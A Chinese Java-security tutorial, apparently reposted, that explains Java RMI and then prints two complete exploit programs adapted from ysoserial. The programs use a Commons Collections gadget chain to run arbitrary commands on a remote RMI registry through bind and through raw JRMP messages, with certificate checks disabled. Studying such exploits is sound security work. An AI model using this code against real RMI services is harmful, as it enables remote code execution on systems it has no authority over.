給個關(guān)注？寶兒！
給個關(guān)注？寶兒！
給個關(guān)注？寶兒！
關(guān)注公眾號：b1gpig信息安全，文章推送不錯過

1.RMI 是什么

RMI(Remote Method Invocation)即Java遠程方法調(diào)用，RMI用于構(gòu)建分布式應(yīng)用程序，RMI實現(xiàn)了Java程序之間跨JVM的遠程通信。
RMI底層通訊采用了Stub(運行在客戶端)和Skeleton(運行在服務(wù)端)機制，RMI調(diào)用遠程方法的大致如下：

1.RMI客戶端在調(diào)用遠程方法時會先創(chuàng)建2.Stub(sun.rmi.registry.RegistryImpl_Stub)。
Stub會將Remote對象傳遞給遠程引用層(java.rmi.server.RemoteRef)并創(chuàng)建java.rmi.server.RemoteCall(遠程調(diào)用)對象。
3.RemoteCall序列化RMI服務(wù)名稱、Remote對象。
4.RMI客戶端的遠程引用層傳輸RemoteCall序列化后的請求信息通過Socket連接的方式傳輸?shù)絉MI服務(wù)端的遠程引用層。
5.RMI服務(wù)端的遠程引用層(sun.rmi.server.UnicastServerRef)收到請求會請求傳遞給6.Skeleton(sun.rmi.registry.RegistryImpl_Skel#dispatch)。
7.Skeleton調(diào)用RemoteCall反序列化RMI客戶端傳過來的序列化。
Skeleton處理客戶端請求：bind、list、lookup、rebind、unbind，如果是lookup則查找RMI服務(wù)名綁定的接口對象，序列化該對象并通過RemoteCall傳輸?shù)娇蛻舳恕?br /> 8.RMI客戶端反序列化服務(wù)端結(jié)果，獲取遠程對象的引用。
9.RMI客戶端調(diào)用遠程方法，RMI服務(wù)端反射調(diào)用RMI服務(wù)實現(xiàn)類的對應(yīng)方法并序列化執(zhí)行結(jié)果返回給客戶端。
10.RMI客戶端反序列化RMI遠程方法調(diào)用結(jié)果。
Back

2.RMI遠程方法調(diào)用測試

第一步我們需要先啟動RMI服務(wù)端，并注冊服務(wù)。

RMI服務(wù)端注冊服務(wù)代碼：

package com.anbai.sec.rmi;import java.rmi.Naming;
import java.rmi.registry.LocateRegistry;public class RMIServerTest {// RMI服務(wù)器IP地址public static final String RMI_HOST = "127.0.0.1";// RMI服務(wù)端口public static final int RMI_PORT = 9527;// RMI服務(wù)名稱public static final String RMI_NAME = "rmi://" + RMI_HOST + ":" + RMI_PORT + "/test";public static void main(String[] args) {try {// 注冊RMI端口LocateRegistry.createRegistry(RMI_PORT);// 綁定Remote對象Naming.bind(RMI_NAME, new RMITestImpl());System.out.println("RMI服務(wù)啟動成功,服務(wù)地址:" + RMI_NAME);} catch (Exception e) {e.printStackTrace();}}}

程序運行結(jié)果：

copyRMI服務(wù)啟動成功,服務(wù)地址:rmi://127.0.0.1:9527/test

Naming.bind(RMI_NAME, new RMITestImpl())綁定的是服務(wù)端的一個類實例，RMI客戶端需要有這個實例的接口代碼(RMITestInterface.java)，RMI客戶端調(diào)用服務(wù)器端的RMI服務(wù)時會返回這個服務(wù)所綁定的對象引用，RMI客戶端可以通過該引用對象調(diào)用遠程的服務(wù)實現(xiàn)類的方法并獲取方法執(zhí)行結(jié)果。

RMITestInterface示例代碼：

package com.anbai.sec.rmi;import java.rmi.Remote;
import java.rmi.RemoteException;/*** RMI測試接口*/
public interface RMITestInterface extends Remote {/*** RMI測試方法** @return 返回測試字符串*/String test() throws RemoteException;}

這個區(qū)別于普通的接口調(diào)用，這個接口在RMI客戶端中沒有實現(xiàn)代碼，接口的實現(xiàn)代碼在RMI服務(wù)端。

服務(wù)端RMITestInterface實現(xiàn)代碼示例代碼：

package com.anbai.sec.rmi;import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;public class RMITestImpl extends UnicastRemoteObject implements RMITestInterface {private static final long serialVersionUID = 1L;protected RMITestImpl() throws RemoteException {super();}/*** RMI測試方法** @return 返回測試字符串*/@Overridepublic String test() throws RemoteException {return "Hello RMI~";}}

RMI客戶端示例代碼：

package com.anbai.sec.rmi;import java.rmi.Naming;import static com.anbai.sec.rmi.RMIServerTest.RMI_NAME;public class RMIClientTest {public static void main(String[] args) {try {// 查找遠程RMI服務(wù)RMITestInterface rt = (RMITestInterface) Naming.lookup(RMI_NAME);// 調(diào)用遠程接口RMITestInterface類的test方法String result = rt.test();// 輸出RMI方法調(diào)用結(jié)果System.out.println(result);} catch (Exception e) {e.printStackTrace();}}
}

程序運行結(jié)果：

copyHello RMI~

3. RMI反序列化漏洞

RMI通信中所有的對象都是通過Java序列化傳輸?shù)?#xff0c;在學(xué)習(xí)Java序列化機制的時候我們講到只要有Java對象反序列化操作就有可能有漏洞。

既然RMI使用了反序列化機制來傳輸Remote對象，那么可以通過構(gòu)建一個惡意的Remote對象，這個對象經(jīng)過序列化后傳輸?shù)椒?wù)器端，服務(wù)器端在反序列化時候就會觸發(fā)反序列化漏洞。

首先我們依舊使用上述com.anbai.sec.rmi.RMIServerTest的代碼，創(chuàng)建一個RMI服務(wù)，然后我們來構(gòu)建一個惡意的Remote對象并通過bind請求發(fā)送給服務(wù)端。

RMI客戶端反序列化攻擊示例代碼：

package com.anbai.sec.rmi;import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSocketFactory;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.net.Socket;
import java.rmi.ConnectIOException;
import java.rmi.Remote;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RMIClientSocketFactory;
import java.security.cert.X509Certificate;
import java.util.HashMap;
import java.util.Map;import static com.anbai.sec.rmi.RMIServerTest.RMI_HOST;
import static com.anbai.sec.rmi.RMIServerTest.RMI_PORT;/*** RMI反序列化漏洞利用，修改自ysoserial的RMIRegistryExploit：https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/exploit/RMIRegistryExploit.java** @author yz*/
public class RMIExploit {// 定義AnnotationInvocationHandler類常量public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";/*** 信任SSL證書*/private static class TrustAllSSL implements X509TrustManager {private static final X509Certificate[] ANY_CA = {};public X509Certificate[] getAcceptedIssuers() {return ANY_CA;}public void checkServerTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }public void checkClientTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ }}/*** 創(chuàng)建支持SSL的RMI客戶端*/private static class RMISSLClientSocketFactory implements RMIClientSocketFactory {public Socket createSocket(String host, int port) throws IOException {try {// 獲取SSLContext對象SSLContext ctx = SSLContext.getInstance("TLS");// 默認信任服務(wù)器端SSLctx.init(null, new TrustManager[]{new TrustAllSSL()}, null);// 獲取SSL Socket連接工廠SSLSocketFactory factory = ctx.getSocketFactory();// 創(chuàng)建SSL連接return factory.createSocket(host, port);} catch (Exception e) {throw new IOException(e);}}}/*** 使用動態(tài)代理生成基于InvokerTransformer/LazyMap的Payload** @param command 定義需要執(zhí)行的CMD* @return Payload* @throws Exception 生成Payload異常*/private static InvocationHandler genPayload(String command) throws Exception {// 創(chuàng)建Runtime.getRuntime.exec(cmd)調(diào)用鏈Transformer[] transformers = new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{command})};// 創(chuàng)建ChainedTransformer調(diào)用鏈對象Transformer transformerChain = new ChainedTransformer(transformers);// 使用LazyMap創(chuàng)建一個含有惡意調(diào)用鏈的Transformer類的Map對象final Map lazyMap = LazyMap.decorate(new HashMap(), transformerChain);// 獲取AnnotationInvocationHandler類對象Class clazz = Class.forName(ANN_INV_HANDLER_CLASS);// 獲取AnnotationInvocationHandler類的構(gòu)造方法Constructor constructor = clazz.getDeclaredConstructor(Class.class, Map.class);// 設(shè)置構(gòu)造方法的訪問權(quán)限constructor.setAccessible(true);// 實例化AnnotationInvocationHandler，// 等價于: InvocationHandler annHandler = new AnnotationInvocationHandler(Override.class, lazyMap);InvocationHandler annHandler = (InvocationHandler) constructor.newInstance(Override.class, lazyMap);// 使用動態(tài)代理創(chuàng)建出Map類型的Payloadfinal Map mapProxy2 = (Map) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Map.class}, annHandler);// 實例化AnnotationInvocationHandler，// 等價于: InvocationHandler annHandler = new AnnotationInvocationHandler(Override.class, mapProxy2);return (InvocationHandler) constructor.newInstance(Override.class, mapProxy2);}/*** 執(zhí)行Payload** @param registry RMI Registry* @param command  需要執(zhí)行的命令* @throws Exception Payload執(zhí)行異常*/public static void exploit(final Registry registry, final String command) throws Exception {// 生成Payload動態(tài)代理對象Object payload = genPayload(command);String name    = "test" + System.nanoTime();// 創(chuàng)建一個含有Payload的惡意mapMap<String, Object> map = new HashMap();map.put(name, payload);// 獲取AnnotationInvocationHandler類對象Class clazz = Class.forName(ANN_INV_HANDLER_CLASS);// 獲取AnnotationInvocationHandler類的構(gòu)造方法Constructor constructor = clazz.getDeclaredConstructor(Class.class, Map.class);// 設(shè)置構(gòu)造方法的訪問權(quán)限constructor.setAccessible(true);// 實例化AnnotationInvocationHandler，// 等價于: InvocationHandler annHandler = new AnnotationInvocationHandler(Override.class, map);InvocationHandler annHandler = (InvocationHandler) constructor.newInstance(Override.class, map);// 使用動態(tài)代理創(chuàng)建出Remote類型的PayloadRemote remote = (Remote) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Remote.class}, annHandler);try {// 發(fā)送Payloadregistry.bind(name, remote);} catch (Throwable e) {e.printStackTrace();}}public static void main(String[] args) throws Exception {if (args.length == 0) {// 如果不指定連接參數(shù)默認連接本地RMI服務(wù)args = new String[]{RMI_HOST, String.valueOf(RMI_PORT), "open -a Calculator.app"};}// 遠程RMI服務(wù)IPfinal String host = args[0];// 遠程RMI服務(wù)端口final int port = Integer.parseInt(args[1]);// 需要執(zhí)行的系統(tǒng)命令final String command = args[2];// 獲取遠程Registry對象的引用Registry registry = LocateRegistry.getRegistry(host, port);try {// 獲取RMI服務(wù)注冊列表(主要是為了測試RMI連接是否正常)String[] regs = registry.list();for (String reg : regs) {System.out.println("RMI:" + reg);}} catch (ConnectIOException ex) {// 如果連接異常嘗試使用SSL建立SSL連接,忽略證書信任錯誤，默認信任SSL證書registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory());}// 執(zhí)行payloadexploit(registry, command);}}

程序執(zhí)行后將會在RMI服務(wù)端彈出計算器(僅Mac系統(tǒng)，Windows自行修改命令為calc)，RMIExploit程序執(zhí)行的流程大致如下：

使用LocateRegistry.getRegistry(host, port)創(chuàng)建一個RemoteStub對象。
構(gòu)建一個適用于Apache Commons Collections的惡意反序列化對象(使用的是LazyMap+AnnotationInvocationHandler組合方式)。
使用RemoteStub調(diào)用RMI服務(wù)端的bind指令，并傳入一個使用動態(tài)代理創(chuàng)建出來的Remote類型的惡意AnnotationInvocationHandler對象到RMI服務(wù)端。
RMI服務(wù)端接受到bind請求后會反序列化我們構(gòu)建的惡意Remote對象從而觸發(fā)Apache Commons Collections漏洞的RCE。

RMI客戶端端bind序列化：

上圖可以看到我們構(gòu)建的惡意Remote對象會通過RemoteCall序列化然后通過RemoteRef發(fā)送到遠程的RMI服務(wù)端。

RMI服務(wù)端bind反序列化：

具體的實現(xiàn)代碼在：sun.rmi.registry.RegistryImpl_Skel類的dispatch方法，其中的$param_Remote_2就是我們RMIExploit傳入的惡意Remote的序列化對象。

4.RMI-JRMP反序列化漏洞

JRMP接口的兩種常見實現(xiàn)方式：

1.JRMP協(xié)議(Java Remote Message Protocol)，RMI專用的Java遠程消息交換協(xié)議。
2.IIOP協(xié)議(Internet Inter-ORB Protocol) ，基于 CORBA 實現(xiàn)的對象請求代理協(xié)議。

由于RMI數(shù)據(jù)通信大量的使用了Java的對象反序列化，所以在使用RMI客戶端去攻擊RMI服務(wù)端時需要特別小心，如果本地RMI客戶端剛好符合反序列化攻擊的利用條件，那么RMI服務(wù)端返回一個惡意的反序列化攻擊包可能會導(dǎo)致我們被反向攻擊。

我們可以通過和RMI服務(wù)端建立Socket連接并使用RMI的JRMP協(xié)議發(fā)送惡意的序列化包，RMI服務(wù)端在處理JRMP消息時會反序列化消息對象，從而實現(xiàn)RCE。

JRMP客戶端反序列化攻擊示例代碼：

package com.anbai.sec.rmi;import sun.rmi.server.MarshalOutputStream;
import sun.rmi.transport.TransportConstants;import java.io.DataOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.net.Socket;import static com.anbai.sec.rmi.RMIServerTest.RMI_HOST;
import static com.anbai.sec.rmi.RMIServerTest.RMI_PORT;/*** 利用RMI的JRMP協(xié)議發(fā)送惡意的序列化包攻擊示例，該示例采用Socket協(xié)議發(fā)送序列化數(shù)據(jù)，不會反序列化RMI服務(wù)器端的數(shù)據(jù)，* 所以不用擔(dān)心本地被RMI服務(wù)端通過構(gòu)建惡意數(shù)據(jù)包攻擊，示例程序修改自ysoserial的JRMPClient：https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/exploit/JRMPClient.java*/
public class JRMPExploit {public static void main(String[] args) throws IOException {if (args.length == 0) {// 如果不指定連接參數(shù)默認連接本地RMI服務(wù)args = new String[]{RMI_HOST, String.valueOf(RMI_PORT), "open -a Calculator.app"};}// 遠程RMI服務(wù)IPfinal String host = args[0];// 遠程RMI服務(wù)端口final int port = Integer.parseInt(args[1]);// 需要執(zhí)行的系統(tǒng)命令final String command = args[2];// Socket連接對象Socket socket = null;// Socket輸出流OutputStream out = null;try {// 創(chuàng)建惡意的Payload對象Object payloadObject = RMIExploit.genPayload(command);// 建立和遠程RMI服務(wù)的Socket連接socket = new Socket(host, port);socket.setKeepAlive(true);socket.setTcpNoDelay(true);// 獲取Socket的輸出流對象out = socket.getOutputStream();// 將Socket的輸出流轉(zhuǎn)換成DataOutputStream對象DataOutputStream dos = new DataOutputStream(out);// 創(chuàng)建MarshalOutputStream對象ObjectOutputStream baos = new MarshalOutputStream(dos);// 向遠程RMI服務(wù)端Socket寫入RMI協(xié)議并通過JRMP傳輸Payload序列化對象dos.writeInt(TransportConstants.Magic);// 魔數(shù)dos.writeShort(TransportConstants.Version);// 版本dos.writeByte(TransportConstants.SingleOpProtocol);// 協(xié)議類型dos.write(TransportConstants.Call);// RMI調(diào)用指令baos.writeLong(2); // DGCbaos.writeInt(0);baos.writeLong(0);baos.writeShort(0);baos.writeInt(1); // dirtybaos.writeLong(-669196253586618813L);// 接口Hash值// 寫入惡意的序列化對象baos.writeObject(payloadObject);dos.flush();} catch (Exception e) {e.printStackTrace();} finally {// 關(guān)閉Socket輸出流if (out != null) {out.close();}// 關(guān)閉Socket連接if (socket != null) {socket.close();}}}}

測試流程同上面的RMIExploit，這里不再贅述。

總結(jié)

以上是生活随笔為你收集整理的java安全(三)RMI的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。